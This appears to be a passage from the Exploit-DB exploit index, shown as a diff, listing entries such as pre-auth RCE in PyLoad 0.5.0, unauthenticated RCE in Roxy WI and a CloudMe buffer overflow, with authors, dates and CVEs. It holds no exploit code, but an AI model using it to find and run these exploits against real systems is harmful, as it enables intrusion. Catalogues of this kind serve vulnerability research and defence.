51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,,
39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
51669,exploits/python/webapps/51669.txt,"Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)",2023-08-08,"Daniel Barros",webapps,python,,2023-08-08,2023-08-08,0,CVE-2023-29689,,,,,
51978,exploits/python/webapps/51978.txt,"Ray OS v2.6.3 - Command Injection RCE(Unauthorized)",2024-04-12,Fire_Wolf,webapps,python,,2024-04-12,2024-04-12,0,CVE-2023-6019,,,,,
51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,,
@ -46391,6 +46401,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39520,exploits/windows_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,local,windows_x86-64,,2016-03-02,2016-03-02,0,,,,,,https://github.com/Cr4sh/secretnet_expl
40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64,,2016-10-03,2016-10-03,1,,"Metasploit Framework (MSF)",,,,
40342,exploits/windows_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",local,windows_x86-64,,2016-09-07,2016-09-07,0,,,,,,
51977,exploits/windows_x86-64/local/51977.txt,"Terratec dmx_6fire USB - Unquoted Service Path",2024-04-12,"Joseph Kwabena Fiagbor",local,windows_x86-64,,2024-04-12,2024-04-12,0,CVE-2024-31804,,,,,
51843,exploits/windows_x86-64/local/51843.txt,"Windows PowerShell - Event Log Bypass Single Quote Code Execution",2024-03-03,hyp3rlinx,local,windows_x86-64,,2024-03-03,2024-03-03,0,,,,,,
45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,,2018-08-14,2018-08-14,0,CVE-2018-6892,,,,,
46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,,2019-01-28,2019-01-29,0,CVE-2018-6892,Remote,,,http://www.exploit-db.comCloudMe_1112.exe,

Can't render this file because it is too large.